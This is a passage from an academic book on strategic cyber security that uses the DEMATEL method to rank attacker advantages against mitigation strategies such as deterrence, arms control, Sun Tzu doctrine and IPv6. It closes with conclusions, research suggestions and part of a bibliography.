Attack Deterrence Cyber Arms Control Direct Influence A IT Vulnerabilities 0 4 4 4 3 3 2 3 3 26 B Asymmetry 2 0 1 4 4 2 4 4 3 24 C Anonymity 2 4 0 4 4 4 4 4 4 30 D Inadequate Cyber Defense 4 3 3 0 2 2 3 4 2 23 E Empowered Non-State Actors 1 2 2 1 0 2 4 3 3 18 F Next Gen Internet: IPv6 3 2 4 2 1 0 2 2 2 18 G Best Mil Doctrine: Sun Tzu 3 3 2 4 2 1 0 4 2 21 H Cyber Attack Deterrence 1 2 2 2 2 1 2 0 3 15 I Cyber Arms Control 1 1 2 2 2 1 2 3 0 14 Level Influenced 17 21 20 23 20 16 23 27 22 Figure 5. DEMATEL “Expert Knowledge” Influence Matrix X. A quick glance at Matrix X shows that it is dominated by the cyber attack advan- tages, which are much more influential in this system of influences than the mitiga- tion strategies. The average “direct influence” strength of the advantages is 24.2, versus a mitigation strategy average of 17. The attack advantages also possess the overwhelming majority of scoring at the “very high” influence level: 17 to 3. This result appears intuitive. It correlates to the common perception in the world to- day that cyber attackers have enormous advantages over their cyber defense coun- terparts. Fig. 6, below, ranks all factors in Matrix X by the simple addition of their individual influence levels, by row. To keep them visually distinct, the advantages are in yellow, and the mitigation strategies are colored dark green. 144 DATA ANALYSIS AND RESEARCH RESULTS Factor Direct Influence C Anonymity 30 A IT Vulnerabilities 26 B Asymmetry 24 D Inadequate Cyber Defense 23 G Best Mil Doctrine: Sun Tzu 21 E Empowered Non-State Actors 18 F Next Gen Internet: IPv6 18 H Cyber Attack Deterrence 15 I Cyber Arms Control 14 Figure 6. “Direct Influence” by Factor. According to Matrix X, the most influential factor in strategic cyber security today is the ability of so many cyber attackers to remain anonymous to their victims. The second most important factor is the seemingly endless list of IT vulnerabilities from which cyber attackers are able to choose. The most effective mitigation strategy in this list, and the only one to rank as more influential than any one of the attacker advantages, is the application of the world’s most influential military treatise, Sun Tzu’s Art of War, to cyber conflict. The least influential mitigation strategy is cyber arms control, which suffers enormously from the fact that it is difficult to define a cyber weapon and even more difficult to conduct a cyber weapons inspection. Fig. 7 adds the columns of Matrix X in order to show each factor’s level of suscepti- bility to influence from the other factors in the matrix. 145 Key Findings Factor Susceptibility to Influence H Cyber Attack Deterrence 27 G Best Mil Doctrine: Sun Tzu 23 D Inadequate Cyber Defense 23 I Cyber Arms Control 22 B Asymmetry 21 E Empowered Non-State Actors 20 C Anonymity 20 A IT Vulnerabilities 17 F Next Gen Internet: IPv6 16 Figure 7. Susceptibility to Influence. The results are intriguing: both the highest- and lowest-ranked factors are miti- gation strategies. This appears illogical, but a closer look reveals why. The most influenced factor in Matrix X – deterrence – is a purely psychological condition, highly dependent on human perception and emotion; thus, it is not surprising that deterrence would be highly susceptible to outside influence. The least influenced factor is IPv6, which is pure technology and therefore tied to human failings to a far lesser degree. Unfortunately for cyber defense, this list shows that cyber attack advantages not only have a higher “direct influence” score than the mitigation strategies, but that they are also more resistant to outside influence. In Fig. 7, the mitigation strategies have an average score of 22, compared to just 20.2 for the advantages. IPv6 scores well, but the other three strategies do not. One way to interpret Fig. 7 is to view the “susceptibility to influence” score as a measure of a factor’s reliability, as well as the confidence that a decision maker could place in it. Thus, cyber attackers are able to rely on their advantages to a much greater degree than cyber defenders can count on current attack mitigation strate- gies. At this point in time, three examined strategies – deterrence, doctrine, and arms control – are of dubious help to cyber defense. Perhaps even more ominously, the two most influential cyber attack advantages – anonymity and IT vulnerabilities – are also the two most difficult cyber attack ad- vantages to influence. Thus, they may prove extremely difficult challenges for cyber defenders to overcome in the future. 146 DATA ANALYSIS AND RESEARCH RESULTS On a positive note, Fig. 7 shows that finding ways to improve cyber defense, such as by hiring the right personnel and by providing them quality training, could yield a high return on investment. “Inadequate cyber defense” has the fourth-highest “di- rect influence” score in Matrix X, and it is also the third-highest factor in terms of susceptibility to outside influence. This makes it a critical factor in the strategic cyber security environment. Causal Loop Diagram The next step in DEMATEL analysis involves constructing a causal loop diagram, as seen in Fig. 8. Such a visual representation of complex data can facilitate human understanding by making the information clearer and more compelling. All factors are placed into a systemic cause-and-effect illustration. In general, the fewer number of parameters that a system contains, the easier it is to control, and the easier it is to display in a graph. Matrix X is large enough – 9x9, or 81 values – that it is already a complex system. In order to make the diagram most useful for this analysis, the author has chosen to display only the “very high” levels of influence between the factors in Matrix X. Figure 8. Strategic Cyber Security: Causal Loop Diagram. 147 Key Findings The color of each factor is shaded according to the number of “very high” levels of influence it projects to the other factors in the system. Thus, as “anonymity” is the most influential factor in Matrix X, it has the darkest color of all factors in Fig. 8. Anonymity impacts almost every other factor in the system at the highest possible level. Two factors, deterrence and arms control, remain white because they do not affect any other factor at the highest level. These are the least influential factors in Matrix X, in Fig. 6, and in this diagram. Cyber attack deterrence, in particular, is dominated by four other, high-impact factors, making it the most susceptible of all factors to outside influence, and the least reliable mitigation strategy for strategic cyber de- fense. A causal loop diagram reveals another key aspect of the interrelationship between factors in a system: some have multiple important connections to other factors, re- gardless of whether the influence is given or received, while others have few. After anonymity – asymmetry, military doctrine, and inadequate cyber defense each have at least five “very high” influence relationships with other factors. This allows them to play a critical role in the system. If decision makers are able to change the nature of any one of these factors in a significant way, the resultant impact on the system as a whole could be considerable. Calculating Indirect Influence A close analysis of the causal loop diagram above reveals that each factor not only has a direct influence on every other factor in the system, but that it also has indirect or transitive influences on the other factors. Eventually, every factor in the system will even influence itself. Fig. 9 below depicts the dynamic of indirect influence at work. Figure 9. Indirect Influence. 148 DATA ANALYSIS AND RESEARCH RESULTS The DEMATEL method is one of the easiest and most useful ways to calculate the sum of direct and indirect influences for a group of interrelated factors.459 First, Matrix X is transformed into normalized Matrix D. The new numbers are derived by dividing the values in Matrix X by the single highest sum found in the rows/ columns, which is Anonymity (whose “direct influence” score is 30). Thus, the new influence levels are: 0=0, 1=.0333, 2=.0667, 3=.1000, and 4=.1333. Matrix D is depicted in Fig. 10. A B C D E F G H I DEMATEL Normalized Matrix D IT Vulnerabilities Asymmetry Anonymity Inadequate Cyber Defense Empowered Non-State Actors Next Gen Internet: IPv6 Best Mil Doctrine: Sun Tzu Cyber Attack Deterrence Cyber Arms Control A IT Vulnerabilities 0 .1333 .1333 .1333 .1000 .1000 .0667 .1000 .1000 B Asymmetry .0667 0 .0333 .1333 .1333 .0667 .1333 .1333 .1000 C Anonymity .0667 .1333 0 .1333 .1333 .1333 .1333 .1333 .1333 D Inadequate Cyber Defense .1333 .1000 .1000 0 .0667 .0667 .1000 .1333 .0667 E Empowered Non-State Actors .0333 .0667 .0667 .0333 0 .0667 .1333 .1000 .1000 F Next Gen Internet: IPv6 .1000 .0667 .1333 .0667 .0333 0 .0667 .0667 .0667 G Best Mil Doctrine: Sun Tzu .1000 .1000 .0667 .1333 .0667 .0333 0 .1333 .0667 H Cyber Attack Deterrence .0333 .0667 .0667 .0667 .0667 .0333 .0667 0 .1000 I Cyber Arms Control .0333 .0333 .0667 .0667 .0667 .0333 .0667 .1000 0 Figure 10. DEMATEL-Normalized Matrix D. 459 Moghaddam et al, 2010. 149 Key Findings Second, Matrix D is transformed into “Total Influence” Matrix T, in which DEMATEL calculates both the direct and indirect influence levels for each factor.460 Matrix T is illustrated in Fig. 11. A B C D E F G H I DEMATEL “Total Influence” Matrix T IT Vulnerabilities Asymmetry Anonymity Inadequate Cyber Defense Empowered Non-State Actors Next Gen Internet: IPv6 Best Mil Doctrine: Sun Tzu Cyber Attack Deterrence Cyber Arms Control Direct Influence A IT Vulnerabilities .1850 .3441 .3298 .3645 .3095 .2643 .3114 .3799 .3285 2.8170 B Asymmetry .2257 .1954 .2186 .3324 .3075 .2077 .3365 .3747 .2979 2.4964 C Anonymity .2664 .3632 .2310 .3867 .3556 .3047 .3911 .4366 .3785 3.1138 D Inadequate Cyber Defense .2842 .2944 .2801 .2223 .2579 .2162 .3101 .3771 .2753 2.5176 E Empowered Non-State Actors .1562 .2117 .2022 .1997 .1448 .1738 .2856 .2867 .2508 1.9115 F Next Gen Internet: IPv6 .2274 .2305 .2765 .2462 .1947 .1295 .2427 .2740 .2374 2.0589 G Best Mil Doctrine: Sun Tzu .2420 .2749 .2329 .3201 .2397 .1712 .1999 .3555 .2550 2.2912 H Cyber Attack Deterrence .1386 .1906 .1821 .2038 .1884 .1304 .2063 .1687 .2289 1.6378 I Cyber Arms Control .1317 .1543 .1755 .1937 .1791 .1242 .1961 .2482 .1290 1.5318 Indirect Influence 1.8572 2.2591 2.1287 2.4694 2.1772 1.7220 2.4797 2.9014 2.3813 Figure 11. “Total Influence” Matrix T. The indirect influences not only transform the matrix, but also transform our under- standing of the nature of the system. Indirect influences are “feedback” influences, which allow each factor to influence every other factor in the system, and over time, to influence even itself. 460 The DEMATEL formula here is T=D * (E-D)^-1, where E is the identity matrix. Analyzing Total Influence Based on DEMATEL-calculated indirect influences, Fig. 12 reveals a more complete picture of cause and effect, based on the “total influence” of each factor within the system. Factor Direct Influence Index Indirect Influence Index Total Influence *** Anonymity 3.1138 2.1287 5.2425 Inadequate Cyber Defense 2.5176 2.4694 4.9870 Best Mil Doctrine: Sun Tzu 2.2912 2.4797 4.7709 Asymmetry 2.4964 2.2591 4.7555 IT Vulnerabilities 2.8170 1.8572 4.6742 Cyber Attack Deterrence 1.6378 2.9014 4.5392 Empowered Non-State Actors 1.9115 2.1772 4.0887 Cyber Arms Control 1.5318 2.3813 3.9131 Next Gen Internet: IPv6 2.0589 1.7220 3.7809 Figure 12. Initial Total Influence Index. The combined direct and indirect “total influence” calculation yields an alternative ranking of the factors. Here, the top four are the same factors identified in the causal loop diagram as having the highest number of very influential relationships with other factors, regardless of whether the influence was given or received. Anonymity is still the most important factor in the system. However, the addition of indirect influence scores reorders other factors in the list. Inadequate cyber defense and military doctrine surpassed IT vulnerabilities and asymmetry in importance (compared to Fig. 6), while deterrence and arms control gained influence at the ex- pense of non-state actors and IPv6. The final step of this DEMATEL analysis subtracts the indirect influences from the direct influences in Fig. 12 to create a final normalized total influence index, which is shown in Fig. 13. 150 DATA ANALYSIS AND RESEARCH RESULTS 151 Key Findings DEMATEL Normalized “Total Influence” Index Score 1 Anonymity .9851 2 IT Vulnerabilities .9598 3 Next Gen Internet: IPv6 .3369 4 Asymmetry .2373 5 Inadequate Cyber Defense .0481 6 Best Mil Doctrine: Sun Tzu -.1886 7 Empowered Non-State Actors -.2654 8 Cyber Arms Control -.8496 9 Cyber Attack Deterrence -1.2636 Figure 13. Final Total Influence Index. After this final calculation, the overall ranking by factor returns closer to the origi- nal direct influence ranking in Fig. 6. In fact, the order of the cyber attack advan- tages is unchanged, as seen in Fig. 14. BEFORE AFTER 1. Anonymity 1. Anonymity 2. IT Vulnerabilities 2. IT Vulnerabilities 3. Asymmetry 3. Asymmetry 4. Inadequate Cyber Defense 4. Inadequate Cyber Defense 5. Empowered Non-State Actors 5. Empowered Non-State Actors Figure 14. Cyber Attack Advantage Summary. However, there is now a much larger statistical gap between the two most impor- tant factors, anonymity and IT vulnerabilities, and the third and fourth place cyber attack advantages, asymmetry and inadequate cyber defense. Non-state actors re- ceived a negative overall score in the final index, which indicates that this concept is a net receiver, and not provider, of influence in the system of strategic cyber security today. The movement of the mitigation strategies in the final index is much more striking. Fig. 15 reveals that all four strategies moved in the list, especially IPv6, which was the only factor in the system to move more than one place in the overall ranking order. BEFORE AFTER 1. Doctrine: Sun Tzu 1. Next Gen Net: IPv6 2. Next Gen Net: IPv6 2. Doctrine: Sun Tzu 3. Deterrence 3. Arms Control 4. Arms Control 4. Deterrence Figure 15. Mitigation Strategy Summary. Following the final DEMATEL “total influence” calculation, IPv6 rose to the third- highest factor in strategic cyber security, behind only anonymity and IT vulner- abilities. Fig. 16 summarizes the factor rankings, before and after the inclusion of indirect influence scoring. Anonymity 30 Anonymity .9851 IT Vulnerabilities 26 IT Vulnerabilities .9598 Asymmetry 24 Next Gen Net: IPv6 .3369 Inadequate Cyber Defense 23 Asymmetry .2373 Doctrine: Sun Tzu 21 Inadequate Cyber Defense .0481 Empowered Non-State Actors 18 Doctrine: Sun Tzu -.1886 Next Gen Net: IPv6 18 Empowered Non-State Actors -.2654 Deterrence 15 Arms Control -.8496 Arms Control 14 Deterrence -1.2636 Figure 16. DEMATEL Indirect Influence Summary. This research suggests that IPv6 has the potential to be a more influential factor in strategic cyber security than three current cyber attack advantages, including asymmetry and inadequate cyber defense. This result is the most significant revela- tion in this study. DEMATEL analysis highlights two powerful IPv6 attributes. First, IPv6 is extremely resistant to outside influence, so it is more “reliable” than other factors in the system. Second, IPv6 influences the single most powerful cyber attack advantage, anonym- 152 DATA ANALYSIS AND RESEARCH RESULTS 153 ity, at a “very high” level. These factors combine, via indirect influence calculations, to radiate the impact of IPv6 throughout the system and to magnify its importance. Thus, for decision makers, this research suggests that IPv6 is currently the single most efficient way to change the dynamics of strategic cyber security in favor of cyber defense. Fig. 17 is a modified causal loop diagram which specifically highlights the signifi- cant influence relationship between IPv6 and the rest of the system. Figure 17. Causal Loop Diagram: IPv6 System Impact. All three other mitigation strategies received negative scores in the final index (Fig. 13), which means they are net receivers, and not providers, of influence in the sys- tem. The second place mitigation strategy is the application of the world’s best mili- tary doctrine, Art of War, to cyber conflict. It is the only other mitigation strategy to finish ahead of even one cyber attack advantage. Cyber arms control and deterrence remain at the bottom of the list, for reasons cited earlier in this book. In summary, this analysis suggests that, even beyond the four cyber attack mitiga- tion strategies evaluated by the author, decision makers could prioritize their invest- ment in other mitigation strategies by category, according to the following formula. Key Findings 154 DATA ANALYSIS AND RESEARCH RESULTS 1. Technical 2. Military 3. Political A technology-centric approach has a greater DEMATEL-calculated influence on the system of strategic cyber security due in part to the fact that it is more reliable than counting on a human-dependent approach – especially when politics come into play. Thus, IPv6 finished first in this list of strategies, and arms control (a hybrid politi- cal/technical approach) moved ahead of deterrence (which relies only on political/ military factors) in the final calculation. 155 V. CONCLUSION 11. RESEARCH CONTRIBUTIONS In the post-World War II era, cyber security has evolved from a technical discipline to a strategic concept. The power of the Internet, our growing dependence upon it, and the disruptive capability of cyber attackers now threaten national and interna- tional security. The nature of a security threat has not changed, but the Internet provides a new delivery mechanism that can increase the speed, scale, and power of an attack. National critical infrastructures are now at risk – not only during war, but also in times of peace. As a consequence, all future political and military conflicts will have a cyber dimension, whose size and impact are difficult to predict. World leaders must address the threat of strategic cyber attacks with strategic re- sponses in favor of cyber defense. In this book, the author examines four strategies that nation-states will likely adopt to mitigate the cyber attack threat: deterrence, arms control, doctrine, and technology. Cyber attack deterrence lacks credibility because hacker skills are easy to acquire, and because attackers are often able to conduct high-asymmetry attacks even while remaining anonymous to their victims. Cyber arms control appears unlikely, because cyberspace is too big to inspect, and malicious code is even hard to define. However, political will, perhaps in the wake of a future cyber attack, could change the status quo. The world’s best military doctrine, Art of War, is more helpful than the first two strategies, but there are at least ten distinctive aspects of the cyber battlefield, none of which fits easily into Sun Tzu’s paradigm. IPv6 answers some of our current security problems, but unfortunately it also cre- ates new problems, including a necessarily long and dangerous transition phase. However, in spite of the shortcomings of IPv6, the DEMATEL method clearly shows that among the four examined mitigation strategies, IPv6 is the most likely to have a tangible impact on reducing the key advantages of a cyber attacker, and thus it is the most likely strategy to improve a nation’s strategic cyber defense posture. The simple reason is that it can reduce the most influential advantage of a cyber attacker, anonymity, and it does so with a higher degree of reliability than the other factors 156 CONCLUSION in this research. Thus, the influence of IPv6 grows over time and impacts all other factors in strategic cyber security. DEMATEL provided a way to analyze the four proposed mitigation strategies with scientific rigor. It calculated specific levels of influence for each key concept identi- fied, and it created a causal loop diagram of the system they comprise. Finally, it calculated the most efficient way – among the four strategies in question – to reduce the threat of strategic cyber attack. The contributions of this book are summarized as follows: • an argument that computer security has evolved from a technical discipline to a strategic concept; • the evaluation of four distinct strategic approaches to mitigate the cyber at- tack threat and to improve a nation’s cyber defense posture; • the use of the Decision Making Trial and Evaluation Laboratory (DEMATEL) to analyze this book’s key concepts; and • the recommendation to policy makers of IPv6 as the most efficient of the four cyber defense strategies. Suggestions for Future Research The DEMATEL method has helped to clarify the landscape of strategic cyber secu- rity. The author believes that DEMATEL could also be used to examine other out- standing problems related to cyber security. Here are three possibilities: Can a cyber attack be an act of war?461 The dynamic nature of cyberspace makes it difficult to predict the next cyber attack, or how serious it could be. An effects-based approach seems inevitable: if the level of human suffering or economic damage is high enough, national leaders will retaliate. This applies both to government and private sector critical infrastructures. A key challenge for national security planners is that the hacker tools and techniques required for cyber espionage are often the same as for cyber attack.462 The difference lies in motivation: does the hacker desire merely to steal information, or is the attack a prelude to war? Can we solve the attribution problem? Smart hackers exploit the international, maze-like architecture of the Internet to conduct anonymous or deniable cyber at- 461 More precisely, the question may be whether a cyber attack could be considered an “armed attack” as specified by the UN Charter. 462 These may be differentiated by the terms computer network exploitation (CNE) and computer net- work attack (CNA). 157 tacks. The trail of evidence often runs through countries with which the victim’s government has poor diplomatic relations or no law enforcement cooperation, and cyber investigations typically end at a hacked, abandoned computer, where the trail goes cold. This dynamic encourages “false flagging” operations – where the attacker tries to pin the blame on a third party – and creates an environment in which even terrorists can find a home on the Internet.463 Solving the attribution problem will require harmonizing cyber crime laws, improving cyber defense methods, and gen- erating the political will to share evidence and intelligence. Can we shift the advantage to cyber defense? Hackers today have enormous ad- vantages over cyber defenders, including anonymity and asymmetry. In fact, if there is a future war between major world powers, a significant degree of the fighting may take place in cyberspace, and the first victim of the conflict could even be the Internet itself. To shift the balance, cyber defenders require a higher level of trust in hardware and software,464 improved performance metrics for defense strategies, and the ability to realistically model the hacker threat in a laboratory. Because it is impossible to eliminate all malicious code from a network, cyber defenders need better ways to neutralize what they cannot find. Governments could also require Internet Service Providers (ISP) to play a more helpful role in preventing the spread of malware. 463 Gray & Head, 2009. 464 Supply chain subversion, i.e. inserting malicious code in the design or production phase of product development, can be almost impossible to detect by the end user. 158 BIBLIOGRAPHY VI. BIBLIOGRAPHY “53/70: Developments in the field of information and telecommunications in the context of international security,” (4 Jan 1999) United Nations General Assembly Resolution: Fifty-Third Session, Agenda Item 63. Acoca, B. (Jul 2008) “Online identity theft,” The OECD Observer, Organisation for Economic Cooperation and Development, 268, 12. “Active Engagement, Modern Defence: Strategic Concept for the Defence and Security of the Members of the North Atlantic Treaty Organisation,” (2010) NATO website: www.nato.int. Adams, J. (2001) “Virtual Defense,” Foreign Affairs 80(3) 98-112. “Advisory 01-009, Increased Internet Attacks against U.S. Web Sites and Mail Servers Possible in Early May,” (26 Apr 2001) Federal Bureau of Investigation (FBI) National Infrastructure Protection Center (NIPC). “Air Force Association; Utah’s Team Doolittle Wins CyberPatriot II in Orlando,” (10 Mar 2010) Defense & Aerospace Business, 42. Aitoro, J.R. (2 Oct 2009) “Terrorists nearing ability to launch big cyberattacks against U.S.” NextGov: www.nextgov.com. Allen, P.D. & Demchek, C.C. (Mar-Apr 2003) “The Cycle of Cyber Conflict,” Military Review. Anonymous. (28 Mar 2009) “Thai cybercrime law denounced as ‘threat to freedom’.” Bangkok Post website, Bangkok, Thailand in English, reported by BBC Monitoring Asia Pacific (29 Mar 2009). Arquilla, J. & Ronfeldt, D. (Apr 1993) “Cyberwar is Coming!” Comparative Strategy 12(2) 141- 165. Barnes, J.E. (28 Nov 2008) “Pentagon computer networks attacked,” Los Angeles Times. Barrera, D., Wurster, G., & van Oorschot, P.C. (14 Sep 2010) “Back to the Future: Revisiting IPv6 Privacy Extensions,” Carleton University School of Computer Science, Ottawa, ON, Canada. “Belarus,” Press Reference: www.pressreference.com/A-Be/Belarus. Bliss, J. (23 Feb 2010) “U.S. Unprepared for ‘Cyber War’, Former Top Spy Official Says,” Bloomberg Businessweek. Brodie, B. (1946) THE ABSOLUTE WEAPON: Atomic Power and World Order. New York: Harcourt, Brace and Co. Bullough, O. (15 Nov 2002) “Russians Wage Cyber War on Chechen Websites,” Reuters. Caterinicchia, D. (12 May 2003) “Air Force wins cyber exercise,” Federal Computer Week 17(14) 37. 159 Chan, W.H. (25 Sep 2006) “Cyber exercise shows lack of interagency coordination,” Federal Computer Week 20(33) 61. Chen, T. & Robert, J-M. (2004) “The Evolution of Viruses and Worms,” Statistical Methods in Computer Security, William W.S. Chen (Ed), (NY: CRC Press) Ch.16, 265-286. Churchman, D. (2005) Why we fight: theories of human aggression and conflict (MD: UP of America) Ch.2, 16. Cody, E. (13 Sep 2007) “Chinese Official Accuses Nations of Hacking,” Washington Post. Cole, E. (2002) Hackers Beware (London: New Riders) 727. Cole, L.A. (1996) “Countering Chem-Bio Terrorism: Limited Possibilities,” Politics and the Life Sciences 15(2) 196. “Common Vulnerabilities and Exposures List,” The MITRE Corporation: http://cve.mitre.org/. “Convention (IV) respecting the Laws and Customs of War on Land and its annex: Regulations concerning the Laws and Customs of War on Land,” (18 Oct 1907) The Hague, International Committee of the Red Cross. Crampton, T. (19 Mar 2006) “Innovation may lower Net users’ privacy,” The New York Times. “Cyber Command’s strategy becomes more clear,” (22 Mar 2011) Federal Computer Week, written by the Defense Systems Staff. “Cyber War: Sabotaging the System,” (8 Nov 2009) CBS: 60 Minutes. Dawson, R. (2003) Living Networks: Leading Your Company, Customers, and Partners in the Hyper-Connected Economy, Ch.7: “The Flow Economy: Opportunities and Risks in the New Convergence,” (New Jersey: Prentice Hall) 141-168. Denning, D.E. (2002) “Activism, Hacktivism, and Cyberterrorism: The Internet as a Tool for Influencing Foreign Policy,” Networks and Netwars: the Future of Terror, Crime, and Militancy, Arquilla, J. & Ronfeldt, D. (Eds.) (RAND Corporation) Ch.8, 239-288. Derene, G. (2009) “Weapon of Mass Disruption,” Popular Mechanics 186(4) 76. Divis, D.A. (9 Mar 2005) “Protection not in place for electric WMD,” UPI. Dobbs, M. (24 Oct 2001) “Online Agitators Breaching Barriers in Mideast: London-Based Saudi Dissidents and Fugitives Find Ways Around Government Censorship,” Washington Post. “Doctoring photos of Egypt’s Hosni Mubarak,” (21 Sep 2010) Economist. Dytczak, M. & Ginda, G. (2010) “Common Input Data Structure for Multiple MADA Methods Application for Objects Evaluation in Civil Engineering.” The 10th International Conference “Modern Building Materials, Structures and Techniques” (Vilnius Gediminas Technical University Publishing House “Technika”) 399–402. 160 BIBLIOGRAPHY Cody, E. (13 Sep 2007) “Chinese Official Accuses Nations of Hacking,” Washington Post. Eichin M.W. & Rochlis, J.A. (1989) “With Microscope and Tweezers: an Analysis of the Internet Virus of November 1988,” IEEE Computer Society Symposium on Security and Privacy 326- 343. “Espionage Report: Merkel’s China Visit Marred by Hacking Allegations,” (27 Aug 2007) Spiegel. Essex, D. (31 Jan 2008) “IPv6 in Japan,” Federal Computer Week. “Evidence Mounts of Pro-Serbian Internet Attack on NATO Countries,” (17 Apr 1999) mi2g: www.mi2g.com. Falkenrath, R.A. (26 Jan 2011) “From Bullets to Megabytes,” The New York Times. Freiling, F.C., Holz, T. & Wicherski, G. “Botnet Tracking: Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks,” (2005) De Capitani di Vimercati, S. et al (Eds.) ESORICS 2005, Springer: LNCS 3679, 319-335. Fulghum, D.A. (2006) “Redefining Victory,” Aviation Week & Space Technology 165(10) 58. Fulghum, D.A., Wall, R. & Butler, A. (26 Nov 2007) “Cyber-Combat’s First Shot,” Aviation Week & Space Technology 167(21) 28. Gabus, A., & Fontela, E. (1973) “Perceptions of the World Problematique: Communication Procedure, Communicating with those Bearing Collective Responsibility,” DEMATEL Report No. 1 (Geneva: Battelle Geneva Research Centre). Gabus, A., & Fontela, E. (1972) “World Problems an Invitation to Further Thought within the Framework of DEMATEL,” (Geneva: Battelle Geneva Research Centre). Gardner, F. (10 May 2000) “Saudis ‘defeating’ internet porn,” BBC News Online. Gavi, S. (24 Nov 1999) “Crossing Censorship Boundaries,” The Middle East Online, Online Journalism Review (Modified: 4 Apr 2002). Geers K. (2010) “A Brief Introduction to Cyber Warfare,” Common Defense Quarterly (Spring) 16-17. Geers K. (2010b) “The challenge of cyber attack deterrence,” Computer Law and Security Review 26(3) 298-303. Geers, K. & Feaver, P. (2004) “Cyber Jihad and the Globalization of Warfare,” DEF CON, Black Hat. Geers K. (2009) “The Cyber Threat to National Critical Infrastructures: Beyond Theory,” The Information Security Journal: A Global Perspective 18(1) 1-7. Re-printed (2010) in Journal of Digital Forensic Practice 3(2) 124-130. Geers K. (2010c) “Cyber Weapons Convention,” Computer Law and Security Review 26(5) 547- 551. 161 Geers K. (2008) “Cyberspace and the Changing Nature of Warfare,” Hakin9 E-Book, 19(3) No. 6, SC Magazine (27 AUG 08), Black Hat 1-12. Geers K. (2011) “Demystifying Cyber Warfare,” forthcoming in per Concordiam 1-6. Geers K. (2011) “From Cambridge to Lisbon: the quest for strategic cyber defense,” in peer- review at Journal of Homeland Security and Emergency Management 1-16. Geers K. (2007a) “Greetz from Room 101,” DEF CON, Black Hat 1-24. Geers, K. (2005) “Hacking in a Foreign Language: a Network Security Guide to Russia,” DEF CON, Black Hat. Geers, K. & Eisen, A. (2007) “IPv6: World Update,” ICIW 2007: Proceedings of the 2nd International Conference on Information Warfare and Security 85-94. Geers K. (2010) “Live Fire Exercise: Preparing for Cyber War,” Journal of Homeland Security and Emergency Management 7(1) 1-16. Geers K. (9 Feb 2011) “Sun Tzu and Cyber War,” Cooperative Cyber Defence Centre of Excellence 1-23. Geers K. & Temmingh, R. (2009) “Virtual Plots, Real Revolution,” The Virtual Battlefield: Perspectives on Cyber Warfare, Czosseck, C. & Geers, K. (Eds) (Amsterdam: IOS Press) 294- 301. Gerth, J. & Risen, J. (2 May 1999) “1998 Report Told of Lab Breaches and China Threat,” The New York Times. Gibbs, W.W. (2000) “Red Team versus the Agents,” Scientific American 283(6) 20, 24. Giles, L. See Sun Tzu, below. Glendinning, L. (10 May 2006) “Briton faces extradition for ‘biggest ever military hack’,” Times Online. Goble, P. (9 Oct 1999) “Russia: analysis from Washington: a real battle on the virtual front,” Radio Free Europe/Radio Liberty. Godara, V. (2010) Strategic Pervasive Computing Applications: Emerging Trends (IGI Global) 39-40. Golding, D. (28 Feb 2006) “Do we really need to have IPv6 when Nat conserves address space and aids security?” Computer Weekly. Goldstein, E. (1 Jul 1999) “The Internet in the Mideast and North Africa: Free Expression and Censorship,” Human Rights Watch. Gomes, L. (31 Mar 2003) “How high-tech games can fail to simulate what happens in war,” Wall Street Journal. 162 BIBLIOGRAPHY Gorbachev, M. & Pfirter, R. (16 Jun 2009) “Disarmament lessons from the Chemical Weapons Convention,” Bulletin of the Atomic Scientists. Gorman, S. (17 Aug 2009b) “Cyber Attacks on Georgia Used Facebook, Twitter, Stolen IDs,” The Wall Street Journal. Gorman, S. (7 May 2009a) “FAA’s Air-Traffic Networks Breached by Hackers,” The Wall Street Journal. Gorman, S. (23 Mar 2010) “U.S. Aims to Bolster Overseas Fight Against Cybercrime,” The Wall Street Journal. Gorman, S., Cole, A. & Dreazen, Y. (21 Apr 2009) “Computer Spies Breach Fighter-Jet Project,” The Wall Street Journal. “Government-Imposed Filtering Schemes Violate the Right to Free Expression,” (2000) Human Rights Watch. Graham, B. (8 Nov 1999) “Military Grappling with Guidelines for Cyber Warfare: Questions Prevented Use on Yugoslavia,” The Washington Post. Gray, D.H. & Head, A. (2009) “The importance of the internet to the post-modern terrorist and its role as a form of safe haven,” European Journal of Scientific Research 25(3) 396-404. Grossetete, P., Popoviciu, C. & Wettling, F. (2008) Global IPv6 Strategies: From Business Analysis to Operational Planning (Indianapolis: Cisco Press) 195. Hagen, S. (2002) IPv6 Essentials (CA: O’Reilly Media, Inc.) 97. Handbook for Bloggers and Cyber-Dissidents (March 2008) Reporters Without Borders: http://en.rsf.org/. Hess, P. (29 Oct 2002) “China prevented repeat cyber attack on US,” UPI. “How Users can Protect their Rights to Privacy and Anonymity,” (1999) Human Rights Watch. Hu, A.H., Hsu, C-W & Chen, S-H. (2010) “Incorporating carbon management into supplier selection in the green supply chain: Evidence from an electronics manufacturer in Taiwan.” “Human rights investigators needed to investigate crackdown on journalists,” (15 March 2011) Reporters Without Borders. Huntley, W.L. (2009) “Abandoning Disarmament? The New Nuclear Nonproliferation Paradigms,” The Challenge of Abolishing Nuclear Weapons, Krieger D. (Ed.) (New Jersey: Transaction Publishers). “International cyber exercise takes place in Tajikistan,” (6 Aug 2009) Avesta website, Dushanbe, Tajikistan (reported by BBC Monitoring Central Asia). “The Internet and Elections: The 2006 Presidential Election in Belarus (and its implications),” (April 2006) OpenNet Initiative: Internet Watch. 163 “Israel lobby group hacked,” (3 Nov 2000) BBC News. Jafari, M., Amiri, R.H. & Bourouni, A. (2008) “An Interpretive Approach to Drawing Causal Loop Diagrams,” Department of Industrial Engineering, Iran University of Science and Technology (IUST). Joch, A. (28 Aug 2006) “Terrorists brandish tech sword, too,” Federal Computer Week. Jolly, D. (31 Jul 2009) “In French Inquiry, a Glimpse at Corporate Spying,” The New York Times. Keizer, G. (11 Aug 2008) “Cyber Attacks Knock out Georgia’s Internet Presence,” Computerworld. Keizer, G. (28 Jan 2009) “Russian ‘cyber militia’ knocks Kyrgyzstan offline,” Computerworld. Kelly, J. (27 Jan 2011) “The piece of paper that fooled Hitler,” BBC News Magazine. Kennicott, P. (23 Sep 2005) “With Simple Tools, Activists in Belarus Build a Movement,” Washington Post. Kirk, J. (30 Oct 2009) “Europe moving slow on IPv6 deployment,” IDG News Service. Krekel, B. (9 Oct 2009) “Capability of the People’s Republic of China to Conduct Cyber Warfare and Computer Network Exploitation” (Northrop Grumman Corporation: prepared for The US- China Economic and Security Review Commission). Lam, F., Beekey, M., & Cayo, K. (2003) “Can you hack it?” Security Management 47(2) 83. Lawlor, M. (2004) “Information Systems See Red,” Signal 58(6) 47. Lee, J.S. (19 Nov 2001) “Companies Compete to Provide Saudi Internet Veil,” The New York Times. Lee, M. (10 May 2006) “Who is Gary McKinnon?” ABC News. 